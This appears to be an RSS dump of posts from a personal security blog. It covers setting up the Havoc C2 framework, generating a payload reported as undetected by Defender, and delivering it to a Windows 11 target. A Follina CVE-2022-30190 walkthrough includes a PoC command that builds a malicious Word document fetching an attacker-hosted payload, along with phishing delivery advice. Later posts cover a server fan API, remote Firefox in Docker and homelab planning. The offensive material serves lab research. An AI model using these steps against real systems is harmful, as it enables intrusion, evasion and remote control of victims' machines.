<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983179325/d1f65f54-8b40-4930-a945-6d4a1fe86c42.png" alt="Havoc C2: First look" /></p>
<p><em>Setting up the</em> <code>bookworm</code> repo for Python 3.10. Note that the redirect to <code>/etc/apt/sources.list</code> needs root, so the line is appended via <code>sudo tee -a</code>; also be aware that mixing package repositories from different Debian releases can cause dependency conflicts, so only pull what you need from the added repo.</p>
<pre><code class="lang-plaintext">┌──(nee㉿4pfsec)-[~] 
└─$ echo 'deb http://ftp.de.debian.org/debian bookworm main' | sudo tee -a /etc/apt/sources.list
┌──(nee㉿4pfsec)-[~] 
└─$ sudo apt update
┌──(nee㉿4pfsec)-[~] 
└─$ sudo apt install python3-dev python3.10-dev libpython3.10 libpython3.10-dev python3.10
</code></pre>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983181253/c6d0867b-53aa-46cf-b009-b956262341ce.png" alt="Havoc C2: First look" /></p>
<h3 id="heading-setup">Setup</h3>
<p><em>Git Clone</em></p>
<pre><code class="lang-plaintext">┌──(nee㉿4pfsec)-[~] 
└─$ git clone https://github.com/HavocFramework/Havoc.git
</code></pre>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983182340/c24cdfab-961d-42fe-9104-d64669e63497.png" alt="Havoc C2: First look" /></p>
<p><em>Building the Client</em></p>
<pre><code class="lang-plaintext">cd Havoc/Client
mkdir Build
cd Build
cmake ..
cd ..
./Install.sh
</code></pre>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983184042/a29c5e34-aa5b-4f78-a956-7135324076f7.png" alt="Havoc C2: First look" /></p>
<p><em>Building the Teamserver</em></p>
<pre><code class="lang-plaintext">cd Havoc/Teamserver
go mod download golang.org/x/sys
go mod download github.com/ugorji/go
</code></pre>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983185804/0d7c9b04-e2d4-4da9-ada6-6100d91a767b.png" alt="Havoc C2: First look" /></p>
<pre><code class="lang-plaintext">┌──(nee㉿4pfsec)-[~/Havoc/Teamserver] 
└─$ ./teamserver
</code></pre>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983187603/ff8e821e-4608-450c-9eee-2b9809bd72e2.png" alt="Havoc C2: First look" /></p>
<p>With that, Havoc is installed and ready to go!</p>
<hr />
<h2 id="heading-havoc-framework">Havoc Framework</h2>
<p>The C2 consists of 2 main parts. The client and the team server. Let's start off with the Teamserver.</p>
<h3 id="heading-teamserver">Teamserver</h3>
<p>The teamserver allows us to specify a profile or use the default one. The profile allows us to edit configs of the following domains:</p>
<ul>
<li><p>Teamserver</p>
</li>
<li><p>Operator</p>
</li>
<li><p>Listener</p>
</li>
<li><p>Service</p>
</li>
<li><p>Payload</p>
</li>
</ul>
<p>The default profile is located at <code>Havoc/Teamserver/profiles</code>.</p>
<p>Running the teamserver with a profile:</p>
<pre><code class="lang-plaintext">┌──(nee㉿4pfsec)-[~/Havoc/Teamserver] 
└─$ ./teamserver server --profile profiles/havoc.yaotl
</code></pre>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983188738/34d02df8-b3c3-4763-867c-08a011d5376b.png" alt="Havoc C2: First look" /></p>
<hr />
<h3 id="heading-client">Client</h3>
<p><em>Running the Client</em></p>
<pre><code class="lang-plaintext">┌──(kali㉿kali)-[~] 
└─$ Havoc/Client/Havoc
</code></pre>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983189898/985f5ba8-645f-4084-b3d9-2284cca2ebc3.png" alt="Havoc C2: First look" /></p>
<p><em>Connecting to the teamserver</em></p>
<ul>
<li><p>Name</p>
</li>
<li><p>C2 Host</p>
</li>
<li><p>C2 port</p>
</li>
<li><p>C2 User:Password</p>
</li>
</ul>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983191501/ae92838f-398b-4cd0-9e45-b216ea4fd841.png" alt="Havoc C2: First look" /></p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983193129/9ed48bd4-ec89-488d-badd-b827ea9d79c0.png" alt="Havoc C2: First look" /></p>
<p>And we're in! The Dracula theme on the client looks really good. Let's check out some of the functionalities!</p>
<hr />
<h3 id="heading-configuring-listeners">Configuring Listeners</h3>
<p>View-&gt;Listeners-&gt;Add</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983195308/a84cec73-418c-44fb-b838-062966ef1c23.png" alt="Havoc C2: First look" /></p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983196718/fb9fc5c4-feb6-442d-ac21-f506bf015642.png" alt="Havoc C2: First look" /></p>
<p>Let's configure our listener and point the host to <code>c2.4pfsec.com</code>. This is the domain proxied through Cloudflare.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983198416/31bb1085-3285-4502-a3c0-7a0b67b2cf2c.png" alt="Havoc C2: First look" /></p>
<hr />
<h3 id="heading-generating-payload-undetected-by-windows-defender">Generating Payload (UNDETECTED BY Windows Defender)</h3>
<p>As of writing, the payload is not detected by Microsoft Defender. (05/10/22)</p>
<p>Attack-&gt;Payload-&gt;Generate</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983199714/ccc712ba-0c90-41b3-8a2d-abe7a1214996.png" alt="Havoc C2: First look" /></p>
<hr />
<h3 id="heading-callback-to-c2-undetected-by-windows-defender">Callback to C2 (UNDETECTED BY Windows Defender)</h3>
<p>As of writing, the callback method is not picked up by Microsoft Defender. (05/10/22)</p>
<p>Now that we have our payload, let's deliver and execute it. [You're free to use any delivery method.]</p>
<p>I simply hosted an SMB share and transferred the payload to the target. As shown in the demo below, I was able to get a callback from a fully patched Windows 11 Pro machine using the generated payload.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983200799/4eaf267b-af61-4d8a-aba9-b13681915217.png" alt="Havoc C2: First look" /></p>
<p><a href="https://youtu.be/8_j2rkMt6ao">https://youtu.be/8_j2rkMt6ao</a></p>
<hr />
<h3 id="heading-interacting-with-target">Interacting with Target</h3>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983202406/3c61d92d-742d-46c9-a366-e926fad89652.png" alt="Havoc C2: First look" /></p>
<p>There's a whole list of commands that you're able to run on the target once it calls back to your C2. The target polls the C2 for jobs at the sleep interval chosen during payload generation.</p>
<p><em>shell</em></p>
<p>You're able to run shell commands directly on the target with the help of Havoc.</p>
<pre><code class="lang-plaintext">&gt;&gt;&gt; shell [command]
</code></pre>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983203688/d9e27f64-aefd-4fb4-8737-70fba3111454.png" alt="Havoc C2: First look" /></p>
<p><em>Screenshot</em></p>
<p>The screenshot command takes a snapshot of the target's desktop and sends it back to the C2.</p>
<pre><code class="lang-plaintext">&gt;&gt;&gt; screenshot
</code></pre>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983204788/8f5f28d8-e0c0-48f4-a810-efb4c447bf8f.png" alt="Havoc C2: First look" /></p>
<p>Seen on Host</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983206521/a051c78f-e6da-445d-aeac-eabeb311ea4f.png" alt="Havoc C2: First look" /></p>
<p>Seen on C2</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983207753/fef48f1a-bab5-4939-b12a-38faaa590d1a.png" alt="Havoc C2: First look" /></p>
<p>These were just some of the post-exploitation features offered by Havoc.</p>
<hr />
<p>Havoc looks to have great potential and I hope to continue this series by exploring the C2 in-depth real soon!</p>
]]></content:encoded></item><item><title><![CDATA[How I Control My Dell PowerEdge R710's Fans Remotely with an API]]></title><description><![CDATA[Remotely monitoring my server's temperature and controlling the fan speed accordingly has been one of the more frustrating things I had to do. But that ends today! (Kind of...) Here's how I solved that issue with Python Flask and ipmitool.
[
GitHub -...]]></description><link>https://4pfsec.com/how-i-control-my-dell-poweredge-r710s-fans-remotely-with-an-api</link><guid isPermaLink="true">https://4pfsec.com/how-i-control-my-dell-poweredge-r710s-fans-remotely-with-an-api</guid><dc:creator><![CDATA[Nee]]></dc:creator><pubDate>Fri, 10 Jun 2022 17:44:08 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983243517/d4bedb7d-97ea-40ce-9828-34690d6711dc.jpeg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983214426/187f5824-195e-422e-8ea8-71df6895ec43.jpeg" alt="How I Control My Dell PowerEdge R710's Fans Remotely with an API" /></p>
<p>Remotely monitoring my server's temperature and controlling the fan speed accordingly has been one of the more frustrating things I had to do. But that ends today! (Kind of...) Here's how I solved that issue with Python Flask and ipmitool.</p>
<p><a target="_blank" href="https://github.com/ItsNee/Dell-PowerEdge-R710-Fan-Controller-API.git">GitHub - ItsNee/Dell-PowerEdge-R710-Fan-Controller-API: A simple API made with Python Flask to help manage fan speeds on the Dell PowerEdge R710 Enterprise Server</a></p>
<hr />
<h2 id="heading-prerequisites">Prerequisites</h2>
<ul>
<li>A system on the same network as the server, with Python 3 installed (this could very well be the server itself or a virtual machine running on the server; the baseline requirement is that the machine can reach the server without any network issues)</li>
<li>Dell server with iDRAC and IPMI over LAN turned on</li>
</ul>
<hr />
<h2 id="heading-solution-to-issue">Solution to Issue</h2>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983218522/f3abf439-3152-4d5d-a456-860dd9e9f682.png" alt="How I Control My Dell PowerEdge R710's Fans Remotely with an API" /></p>
<p>With the help of IPMI (Intelligent Platform Management Interface) over LAN, we are able to query power supply usage, fan speed, server health, security details, and the state of the operating system. However, I'll only be using it to query the server's temperature and change the fan speed.</p>
<p>One small hurdle is that we have to have a machine on the same network as the server (unless you want to expose your IPMI to the public internet). This bump can be overcome with the help of a custom-made API exposed to the internet through a reverse proxy. However, it's highly recommended that you obscure, and ideally authenticate, your API endpoint to prevent malicious actors from playing around with it: forcing the wrong fan speed can cause serious damage to the hardware.</p>
<p><a target="_blank" href="https://github.com/ItsNee/Dell-PowerEdge-R710-Fan-Controller-API.git">GitHub - ItsNee/Dell-PowerEdge-R710-Fan-Controller-API: A simple API made with Python Flask to help manage fan speeds on the Dell PowerEdge R710 Enterprise Server</a></p>
<p>Here's the simple Python Flask API Server that I wrote. It performs 2 simple but crucial tasks.</p>
<ul>
<li>Get Current Server Temperature</li>
<li>Set Server Fan Speed</li>
</ul>
<hr />
<h2 id="heading-setup">Setup</h2>
<h3 id="heading-installing-ipmitool">Installing ipmitool</h3>
<p>The Flask application entirely depends on the system having the <code>ipmitool</code> utility. Let's go ahead and install that first.</p>
<pre><code class="lang-plaintext">apt-get install ipmitool -y
</code></pre>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983224058/5bea466c-6715-4563-90cb-c5838702f605.png" alt="How I Control My Dell PowerEdge R710's Fans Remotely with an API" /></p>
<h3 id="heading-installing-python3-and-pip">Installing Python3 and pip</h3>
<pre><code class="lang-plaintext">apt-get install python3 python3-pip -y
</code></pre>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983225984/1381dcd3-fff5-40f7-bfca-f29a399cdf61.png" alt="How I Control My Dell PowerEdge R710's Fans Remotely with an API" /></p>
<h3 id="heading-clone-repository">Clone Repository</h3>
<pre><code class="lang-plaintext">git clone https://github.com/ItsNee/Dell-PowerEdge-R710-Fan-Controller-API.git
</code></pre>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983227093/8d221c32-382e-47f8-9022-7cda4e8d8883.png" alt="How I Control My Dell PowerEdge R710's Fans Remotely with an API" /></p>
<h3 id="heading-installing-requirements">Installing Requirements</h3>
<pre><code class="lang-plaintext">pip3 install -r requirements.txt
</code></pre>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983228900/c5f76786-4c99-47eb-a6ae-31f5135e3ac8.png" alt="How I Control My Dell PowerEdge R710's Fans Remotely with an API" /></p>
<hr />
<h2 id="heading-run-server">Run Server</h2>
<h3 id="heading-foreground">Foreground</h3>
<pre><code class="lang-plaintext">python3 api-server.py
</code></pre>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983230628/d9e19ef3-e03f-4776-be83-4bd731dca658.png" alt="How I Control My Dell PowerEdge R710's Fans Remotely with an API" /></p>
<h3 id="heading-background">Background</h3>
<p>Here's how to run the API server in the background.</p>
<pre><code class="lang-plaintext">nohup python3 api-server.py &amp;
</code></pre>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983231610/a1776a2f-fa80-4bd1-a426-fd91db8dbd1e.png" alt="How I Control My Dell PowerEdge R710's Fans Remotely with an API" /></p>
<p>Here's how to kill the background process.</p>
<p>Find the process ID:</p>
<pre><code class="lang-plaintext">ps -faux | grep api-server
</code></pre>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983232412/c0edab37-de89-4fe6-86d3-c5cc207e3e43.png" alt="How I Control My Dell PowerEdge R710's Fans Remotely with an API" /></p>
<p>Kill the process:</p>
<pre><code class="lang-plaintext">kill -9 1085872
</code></pre>
<hr />
<h2 id="heading-api-usage">API Usage</h2>
<pre><code class="lang-plaintext">https://api.myserver.com/                = [Returns a welcome string]
https://api.myserver.com/get-temperature = [Returns the server's temperature]
https://api.myserver.com/set-fan-speed/  = [ variable can be adjusted by end user]
</code></pre>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983233446/a83d33cf-5d64-4472-be8d-6a6942b7c809.png" alt="How I Control My Dell PowerEdge R710's Fans Remotely with an API" /></p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983235070/29d5027a-3286-4e6d-a1bd-5367a121fe44.png" alt="How I Control My Dell PowerEdge R710's Fans Remotely with an API" /></p>
<hr />
<h2 id="heading-ifttt">IFTTT</h2>
<p>IFTTT is a free application that I use to send web requests with a tap of a widget on my phone's home screen.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983237037/77ebcef5-4505-4ab8-93c6-55d8494709a6.png" alt="How I Control My Dell PowerEdge R710's Fans Remotely with an API" /></p>
<p>Creating an applet is as easy as picking "this" and "that". In my case, I went with "If button push, send web request".</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983238333/e7665116-1788-4442-a50a-11ce00ad1d0b.png" alt="How I Control My Dell PowerEdge R710's Fans Remotely with an API" /></p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983240117/74b881a8-a150-4e2e-b2e7-8d9e69ea983f.png" alt="How I Control My Dell PowerEdge R710's Fans Remotely with an API" /></p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983241875/1cc275eb-1c2c-4776-837d-0319933b9b69.png" alt="How I Control My Dell PowerEdge R710's Fans Remotely with an API" /></p>
<p>And with that, I'm able to remotely change my server's Fan Speed with a push of a button from my phone's home screen!</p>
]]></content:encoded></item><item><title><![CDATA[Follina (CVE-2022-30190)]]></title><description><![CDATA[Background

CVE-2022-30190 AKA Folina, is a zero-day found in Microsoft Products that allows a remote attacker to run malicious code on the endpoint. This vulnerability exists in the Windows Support Diagnostic Tool and can be exploited with any appli...]]></description><link>https://4pfsec.com/follina-cve-2022-30190</link><guid isPermaLink="true">https://4pfsec.com/follina-cve-2022-30190</guid><dc:creator><![CDATA[Nee]]></dc:creator><pubDate>Sun, 05 Jun 2022 15:46:26 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983271639/e6bb3351-6eb0-4e41-b0bc-e4f6a3e23693.jpeg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<h2 id="heading-background">Background</h2>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983249111/4037ce46-346e-440a-a778-3357e2151c2b.jpeg" alt="Follina (CVE-2022-30190)" /></p>
<p>CVE-2022-30190, AKA Follina, is a zero-day in Microsoft products that allows a remote attacker to run malicious code on the endpoint. The vulnerability exists in the Windows Support Diagnostic Tool (MSDT) and can be triggered from any application that supports invoking the URL protocol.</p>
<p>I, however, will specifically be taking a look at exploiting this with the help of MS Office files, as phishing is the most common way attackers try to get into a system. I have also put together a mini proof of concept that makes testing this in your environment much easier! Let's set up an environment and take a look at how the exploit works in detail.</p>
<blockquote>
<p>A remote code execution vulnerability exists when MSDT is called using the URL protocol from a calling application such as Word. An attacker who successfully exploits this vulnerability can run arbitrary code with the privileges of the calling application. The attacker can then install programs, view, change, or delete data, or create new accounts in the context allowed by the user’s rights.<br />-<a target="_blank" href="https://msrc-blog.microsoft.com/">Microsoft Security Response Center</a></p>
</blockquote>
<p><a target="_blank" href="https://github.com/ItsNee/Folina-CVE-2022-30190-POC">GitHub - ItsNee/Folina-CVE-2022-30190-POC</a></p>
<h2 id="heading-how-it-works">How It Works</h2>
<p>It all begins with the malicious Word document. All Office documents are essentially zip archives, so anyone can unpack them with the <code>unzip</code> command.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983253972/2d4aa64c-5c74-4de7-a964-30af08264ef2.png" alt="Follina (CVE-2022-30190)" /></p>
<p>Doing so reveals the files contained within a Word document. The specific file in question here is <code>word/_rels/document.xml.rels</code>.</p>
<p><code>document.xml.rels</code> is an XML file that maps relationships within the document (image placeholders, tables, fonts) to external resources (images or videos hosted online). The exploit abuses this functionality.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983255689/d7be8c58-cc35-4cad-a7ae-ba62357aac41.png" alt="Follina (CVE-2022-30190)" /></p>
<p>The attacker first unpacks a Word document as shown in the previous step, modifies the relationship target to point to their web server hosting the malicious payload as shown above, and repacks the Word file.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983257405/36e90983-b3be-4277-a547-d92ce1ea1899.png" alt="Follina (CVE-2022-30190)" /></p>
<p>Shown above is the payload hosted on a remote server. Initially, researchers found that the MSDT tool requires a PIN before it will run any code, so the exploit was thought to be impractical. However, a researcher then found that if the payload hosted on the remote server is larger than 4096 bytes, MSDT will go on to run arbitrary code, giving the attacker remote code execution. Another researcher, <a target="_blank" href="https://billdemirkapi.me/"><strong>Bill Demirkapi</strong></a>, has written an in-depth piece explaining how this works and <a target="_blank" href="https://billdemirkapi.me/unpacking-cve-2021-40444-microsoft-office-rce/">why the number is 4096</a>. Now that we have taken a look at how the exploit works, let's see it in action!</p>
<h2 id="heading-lab-setup">Lab Setup</h2>
<h3 id="heading-prerequisites">Prerequisites</h3>
<ul>
<li><a target="_blank" href="https://developer.microsoft.com/en-us/windows/downloads/virtual-machines/">Windows 10/11 virtual machine</a></li>
<li><a target="_blank" href="https://www.microsoft.com/en-us/download/details.aspx?id=49117">Office Deployment Tool</a> (download and install it on the VM)</li>
</ul>
<h3 id="heading-installing-office-2021-enterprise">Installing Office 2021 Enterprise</h3>
<p>    C:\Users\User&gt;setup.exe /configure configuration-Office2021Enterprise.xml</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983258671/ca33079b-ba9d-43ea-a6e1-eed1621b6528.png" alt="Follina (CVE-2022-30190)" /></p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983260504/0c837f62-6892-44e5-8528-2ea02d1cef82.png" alt="Follina (CVE-2022-30190)" /></p>
<p>That's all for the setup!</p>
<h2 id="heading-exploitation">Exploitation</h2>
<p><a target="_blank" href="https://github.com/ItsNee/Folina-CVE-2022-30190-POC">GitHub - ItsNee/Folina-CVE-2022-30190-POC</a></p>
<p>To make things easier, I wrote up a proof-of-concept for this vulnerability. Here's how it works:</p>
<h3 id="heading-clone-the-poc">Clone the POC</h3>
<p>    git clone https://github.com/ItsNee/Folina-CVE-2022-30190-POC.git
    cd Folina-CVE-2022-30190-POC</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983264532/a56c42a0-f89e-49d6-8fd2-c09864a7245e.png" alt="Follina (CVE-2022-30190)" /></p>
<h3 id="heading-run-exploit">Run Exploit</h3>
<p>    python3 folina.py --payload-url "http://192.168.200.144:1337/pwn.html"</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983266256/35ab1e45-77ff-45d4-a112-96625522b01f.png" alt="Follina (CVE-2022-30190)" /></p>
<p>Running this creates a malicious Word document pointing at the given <code>--payload-url</code> and hosts the default payload on port <code>1337</code> on all interfaces of the machine the tool is run on.</p>
<h3 id="heading-deliver-malicious-file">Deliver Malicious File</h3>
<p>Deliver the malicious Word document created by the script to your endpoint. From the attacker's point of view, this could be via a phishing email of some sort.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983267954/1d94f849-4422-4f8b-80f1-f060c7b93657.png" alt="Follina (CVE-2022-30190)" /></p>
<h3 id="heading-execute-file">Execute File</h3>
<p>Once the user opens the file, the web server hosting the payload receives a callback and the calculator application is opened on the endpoint without any further user action.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983269214/7a9f3266-e2e2-40af-9f66-ae75704d5fe7.png" alt="Follina (CVE-2022-30190)" /></p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983270465/7dbcc309-be81-46de-a773-1180c03d0793.png" alt="Follina (CVE-2022-30190)" /></p>
<h3 id="heading-video-demo">Video Demo</h3>
<iframe width="200" height="113" src="https://www.youtube.com/embed/jh0LafkBnpo?feature=oembed"></iframe>

<h2 id="heading-mitigation">Mitigation</h2>
<p>Microsoft and other security researchers have released workarounds that have been shown to work against this exploit.</p>
<ul>
<li><a target="_blank" href="https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/">Disable the MSDT URL Protocol</a></li>
</ul>
<p>On top of this, Microsoft Defender has also started to actively detect and protect against it. There might still be bypasses out in the wild, so beware. Disable the MSDT URL protocol if you can afford to!</p>
<hr />
<p>Hope you found this insightful!!</p>
]]></content:encoded></item><item><title><![CDATA[Remoting into a Web Browser via another Web Browser]]></title><description><![CDATA[I've always wanted to set something like this so that I could safely have all of my accounts and cookies on a browser that I could trust and not sacrifice privacy.
Most of the time the endpoint given to any person by any entity would have some sort o...]]></description><link>https://4pfsec.com/remoting-into-a-web-browser-via-another-web-browser</link><guid isPermaLink="true">https://4pfsec.com/remoting-into-a-web-browser-via-another-web-browser</guid><category><![CDATA[Homelab]]></category><dc:creator><![CDATA[Nee]]></dc:creator><pubDate>Sat, 07 May 2022 09:09:48 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983286278/0bdab8be-7568-458b-b49f-2d2a8803dffe.jpeg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983277662/f7b1962e-c08d-4d51-b05a-45e3ad1116b0.jpeg" alt="Remoting into a Web Browser via another Web Browser" /></p>
<p>I've always wanted to set up something like this so that I could safely have all of my accounts and cookies on a browser that I could trust and not sacrifice privacy.</p>
<p>Most of the time, the endpoint given to any person by any entity has some sort of monitoring and endpoint security solution. With privacy in mind, this might not allow the user to log in to their personal accounts on the native browser. Let's work towards fixing that with this :)</p>
<p>This is what the end solution looks like! Basically, accessing a browser via another browser.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983279633/82a00235-fcff-4abe-ad9c-f0582ca1b642.png" alt="Remoting into a Web Browser via another Web Browser" /></p>
<hr />
<h2 id="heading-prerequisites">Prerequisites</h2>
<ul>
<li>Some sort of server (Preferably Linux)</li>
<li>Docker &amp; Docker-Compose Installed</li>
</ul>
<p>If you're having trouble installing docker-compose, do check out my post on <a target="_blank" href="https://4pfsec.com/docker-containers/">docker</a>!</p>
<hr />
<h2 id="heading-spinning-up-the-container">Spinning up the container</h2>
<p>This step is pretty straightforward once you have Docker and docker-compose installed.</p>
<p>In your preferred directory, create the following files and folders. (Ignore the .d and .sh files; those will be created by the container.)</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983280899/11d4ec6a-8f22-4f70-b960-e4032e6794e1.png" alt="Remoting into a Web Browser via another Web Browser" /></p>
<p>Next, open the <code>docker-compose.yml</code> file and enter the following contents. Feel free to change my docker compose file to your liking!</p>
<pre><code>version: '3.3'
services:
    firefox:
        container_name: firefox
        ports:
            - '5800:5800'
        volumes:
            - '/firefox/firefox:/config:rw'
        image: jlesage/firefox
        shm_size: "2gb"
        restart: unless-stopped
</code></pre>
<p>Once completed, run the following command to spin up the container :)</p>
<p>    root@ubuntusvr1:~/firefox# docker-compose up -d</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983282516/e0918c61-0018-4c30-8bdd-6b60110221fa.png" alt="Remoting into a Web Browser via another Web Browser" /></p>
<p>Once everything completes with no errors, browse to your IP on port <code>5800</code> and you should see the Firefox session up and running as shown below! 😀</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983283473/1f68ecba-77f9-4529-a42b-325c4ec7214f.png" alt="Remoting into a Web Browser via another Web Browser" /></p>
<hr />
<h2 id="heading-authentication">Authentication</h2>
<p>You can even go a step further and add proxy authentication if you're exposing this out to the open web as shown below!</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983284550/c7dc4021-b5ef-4a57-8639-500f96f695a2.png" alt="Remoting into a Web Browser via another Web Browser" /></p>
<hr />
]]></content:encoded></item><item><title><![CDATA[Planning my Homelab]]></title><description><![CDATA[My time has finally come. After all those years of wanting a personal home lab setup which doesn't run on Pi4, I finally got my hands on a Dell PowerEdge R710 and some other Cisco gear.
Hardware & Specifications
Router

Nokia Beacon
Cisco 1941 Series...]]></description><link>https://4pfsec.com/planning-my-homelab</link><guid isPermaLink="true">https://4pfsec.com/planning-my-homelab</guid><category><![CDATA[Homelab]]></category><dc:creator><![CDATA[Nee]]></dc:creator><pubDate>Tue, 01 Feb 2022 15:08:41 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983302094/9c48921b-9896-480d-8682-baa3fbf86d47.jpeg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983291552/71537af9-7f4c-444d-97a8-328418c2b869.jpeg" alt="Planning my Homelab" /></p>
<p>My time has finally come. After all those years of wanting a personal home lab setup which doesn't run on Pi4, I finally got my hands on a Dell PowerEdge R710 and some other Cisco gear.</p>
<h2 id="heading-hardware-andamp-specifications">Hardware &amp; Specifications</h2>
<h3 id="heading-router">Router</h3>
<ul>
<li><strong>Nokia Beacon</strong></li>
<li><strong>Cisco 1941 Series</strong></li>
</ul>
<h3 id="heading-access-point">Access Point</h3>
<ul>
<li><strong>Nokia Beacon Wifi</strong></li>
<li><strong>CISCO Aironet 1250 Series</strong></li>
</ul>
<h3 id="heading-switch">Switch</h3>
<ul>
<li><strong>Linksys LGS108 8-Port Business Desktop Gigabit Switch</strong></li>
<li><strong>Cisco Catalyst 3750 v2 Series PoE-24</strong></li>
</ul>
<h3 id="heading-server">Server</h3>
<ul>
<li><strong>Dell PowerEdge R710</strong>
<ul>
<li>CPU: 2 x Intel Xeon E5530</li>
<li>RAM: 64GB ECC RAM [config = 8 x 8gb sticks]</li>
<li>Storage: 6 x 600gb SAS drives</li>
<li>Extras: Perc 6i RAID Controller, iDrac remote management</li>
</ul>
</li>
</ul>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983292796/51874d35-a079-4aff-aa3e-e5352c1b0263.png" alt="Planning my Homelab" /></p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983294396/33d937e4-2ef3-4f99-ad3b-95c95d67ff4b.png" alt="Planning my Homelab" /></p>
<hr />
<h2 id="heading-network-topology">Network Topology</h2>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983295932/d764f695-be29-48bd-b6d6-b05664fa2330.png" alt="Planning my Homelab" /></p>
<p>The next thing on the list was to plan my network topology. I had to ensure that I had the optimal setup which did not disrupt the main network. After all, network stability is crucial during these work-from-home times.</p>
<p>This was the final topology that I went with. This topology ensured that I had control of the machines that would possibly be internet-facing with the help of the pfSense firewall. The network also ensured that none of my other devices (i.e. NAS, Access Point, Desktops) would be affected if the server were to face downtime.</p>
<hr />
<h2 id="heading-hypervisor">Hypervisor</h2>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983297043/9f23927a-7cd0-43e8-952e-ad33510674a5.png" alt="Planning my Homelab" /></p>
<p>I spent a good couple of days battling this choice out. I've been team VMware for the past 5 years. Out of those 5 years I've had a year of beginner experience with ESXi. However, upon doing some research, I realized that a ton of homelab enthusiasts use Proxmox.</p>
<p>After looking through a ton of blog posts and weighing out my preferences, I ended up going with VMware ESXi 6.5.0 Update 3 (Build 13932383). Here are a few awesome resources that might help you decide which one's best for you!</p>
<p><a target="_blank" href="https://www.serverwatch.com/reviews/proxmox-vs-esxi/">Proxmox vs ESXi | Choosing the Best Hypervisor | ServerWatch</a> (Sam Ingalls)</p>
<blockquote>
<p><a target="_blank" href="https://www.reddit.com/r/homelab/comments/5vit59/proxmox_vs_esxi/?ref_source=embed&amp;ref=share">Proxmox vs. ESXi</a> from <a target="_blank" href="https://www.reddit.com/r/homelab/">homelab</a></p>
</blockquote>
<hr />
<h2 id="heading-operating-system-andamp-services">Operating System &amp; Services</h2>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983300141/edc73bbb-1818-47a3-b6da-e0d178f6ffe2.png" alt="Planning my Homelab" /></p>
